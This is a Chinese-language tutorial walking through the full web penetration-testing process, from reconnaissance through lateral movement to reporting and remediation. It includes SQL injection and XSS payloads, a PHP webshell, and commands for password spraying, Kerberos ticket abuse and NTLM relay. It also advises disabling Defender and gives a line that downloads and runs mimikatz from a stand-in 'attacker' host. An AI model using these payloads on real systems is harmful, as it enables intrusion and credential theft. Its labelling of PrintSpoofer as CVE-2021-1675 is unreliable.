Web渗透测试全流程实战指南

1. Web渗透测试全景解析：从入门到实战的完整指南

刚接触Web安全时，我最头疼的就是不知道渗透测试到底该从哪入手。网上资料要么太零散，要么一上来就讲SQL注入原理，对整体流程缺乏系统性的梳理。今天我就用自己从甲方安全工程师到乙方渗透工程师的实战经验，带大家走一遍完整的Web渗透流程，包括每个阶段的核心技术点和避坑技巧。

Web渗透的本质是模拟黑客攻击行为来发现系统漏洞，但比黑客更讲究方法论和规范性。完整的流程通常包括信息收集、漏洞扫描、漏洞利用、权限维持、内网渗透、报告编写六大阶段。下面我会用真实的渗透案例（已脱敏）拆解每个环节的技术细节，即使是零基础的小白，跟着这个路线也能建立起系统的攻防思维。

2. 信息收集：渗透测试的基石工程

2.1 目标识别与资产测绘

在拿到一个域名（比如example.com）后，我首先会用以下工具进行资产发现：

bash复制# 子域名爆破常用工具
subfinder -d example.com -o subdomains.txt
amass enum -d example.com -o amass_results.txt

特别注意：商业项目务必确认授权范围，避免扫描非授权域名。我曾遇到过子域名指向客户供应商系统的情况，差点引发法律纠纷。

收集到子域名后，用Nmap进行端口扫描时推荐这个参数组合：

bash复制nmap -sS -Pn -n -T4 --open -p- -oA full_scan 目标IP

• -sS：SYN扫描（半开连接，不易触发防护）
• -Pn：跳过主机发现（避免被防火墙干扰）
• --open：只显示开放端口

2.2 指纹识别与WAF检测

识别Web框架我习惯用Wappalyzer插件结合手动验证：

1. 查看HTTP响应头的X-Powered-By字段
2. 检查静态资源路径（如/wp-content/暴露WordPress）
3. 测试敏感文件（如/robots.txt、/crossdomain.xml）

检测WAF存在有个小技巧：故意在URL后添加/etc/passwd，如果返回403 Forbidden且响应时间明显变长，大概率存在WAF。这时就要考虑使用分块传输、编码绕过等技术。

3. 漏洞扫描与手工验证

3.1 自动化工具的使用策略

AWVS和Nessus这类商业工具虽然强大，但直接全量扫描很容易被封IP。我的经验是：

1. 先在测试环境用低敏感度扫描
2. 对关键系统采用慢速扫描（如设置10秒/请求）
3. 重要漏洞必须手工复现（避免误报）

Burp Suite的被动扫描模式是个折中方案，配置代理后正常浏览网站即可收集漏洞信息，隐蔽性较好。

3.2 常见漏洞的手工检测方法

以SQL注入为例，除了用sqlmap自动化检测，手工测试时要注意：

sql复制-- 布尔型注入检测
1' and 1=1-- -  # 正常显示
1' and 1=2-- -  # 内容消失

-- 时间盲注检测
1'; if (1=1) waitfor delay '0:0:5'-- -

XSS检测时别只用<script>alert(1)</script>，现代WAF都会拦截。试试这些变形：

html复制<svg/onload=alert(1)>
<img src=x onerror=alert(1)>

4. 漏洞利用与权限提升

4.1 突破边界的技术要点

当发现上传漏洞时，我的绕过思路通常是：

1. 修改Content-Type为image/jpeg
2. 添加垃圾数据绕过文件头检测
3. 使用.htaccess配置解析规则
4. 尝试.php5、.phtml等备用后缀

比如最近一次实战中，我用这个技巧成功上传webshell：

php复制GIF89a; <?php system($_GET['cmd']); ?>

4.2 从Web到系统的提权路径

拿到webshell后，我会立即做这几件事：

1. 查看当前用户权限：whoami /priv
2. 收集系统信息：systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
3. 检查补丁情况：wmic qfe get Caption,Description,HotFixID,InstalledOn

Windows提权常用EXP：

• PrintSpoofer（CVE-2021-1675）
• JuicyPotato（服务账户提权）
• RoguePotato（替代JuicyPotato）

5. 内网渗透关键技巧

5.1 横向移动的三种武器

1. 密码喷射攻击：

bash复制crackmapexec smb 192.168.1.0/24 -u userlist.txt -p 'Spring2023!' 

2. 票据传递攻击：

bash复制# 导出票据
sekurlsa::tickets /export

# 注入票据
kerberos::ptt [0;2c7a2]-2-0-60a10000-Administrator@krbtgt-DOMAIN.LOCAL.kirbi

3. NTLM中继攻击：

bash复制ntlmrelayx.py -tf targets.txt -smb2support -c "ipconfig"

5.2 域渗透的黄金票据

获取krbtgt账户的NTLM哈希后：

bash复制# 生成黄金票据
golden_ticket.py -domain-sid S-1-5-21-415... -krbtgt-hash a9b30... -domain domain.local -user fakeadmin

血泪教训：在内网使用mimikatz一定要先关闭Defender实时防护，否则刚注入的票据会被立即清除。建议使用内存加载的方式执行：powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://attacker/mimikatz.ps1')"

6. 报告编写与修复建议

6.1 漏洞评级的三要素

我给漏洞定级时主要考虑：

1. 可利用性：是否需要认证？攻击复杂度如何？
2. 影响范围：是单个页面还是整个系统？
3. 业务影响：是否会导致数据泄露或系统瘫痪？

比如一个需要社工配合的存储型XSS，虽然技术难度低，但如果出现在用户管理中心，我会定为高危而非中危。

6.2 修复方案的四层防御

以SQL注入为例，完整的修复应该包括：

1. 代码层：使用参数化查询

   java复制// 错误示范
   String query = "SELECT * FROM users WHERE id = " + input;
   
   // 正确做法
   PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE id = ?");
   stmt.setInt(1, Integer.parseInt(input));
   

2. 架构层：部署WAF
3. 运维层：最小权限原则配置数据库账户
4. 监控层：审计日志中检测SQL错误语法

7. 新手常见误区与进阶建议

7.1 必须避开的五个坑

1. 盲目使用自动化工具：sqlmap的--level 5参数可能触发WAF封禁
2. 忽略环境差异：测试环境的漏洞在生产环境可能不存在
3. 过度依赖公开EXP：MS17-010的EXP在打了部分补丁的系统上会导致蓝屏
4. 遗漏痕迹清理：忘记删除webshell和日志可能导致法律风险
5. 忽视防御绕过：现代EDR会检测mimikatz的经典调用方式

7.2 能力提升的四个维度

根据OWASP的渗透测试标准，我建议的学习路径：

1. 基础阶段（1-3个月）：

   • 掌握Burp Suite核心功能
   • 理解OWASP Top 10漏洞原理
   • 搭建DVWA靶机环境练习

2. 进阶阶段（3-6个月）：

   • 学习内网协议（SMB、LDAP、Kerberos）
   • 熟悉免杀技术（如C#反射加载）
   • 研究WAF绕过技巧

3. 高手阶段（6-12个月）：

   • 开发自定义渗透工具
   • 分析CVE补丁差异
   • 参与CTF比赛或众测项目

最后分享一个实用技巧：建立自己的漏洞库模板，我习惯用Notion记录每个漏洞的验证步骤、利用代码和修复方案，三年下来已经积累了200+条实战案例，这对提升工作效率帮助巨大。渗透测试的本质是持续学习的过程，保持好奇心和对技术的敬畏心，才能在这个领域走得更远。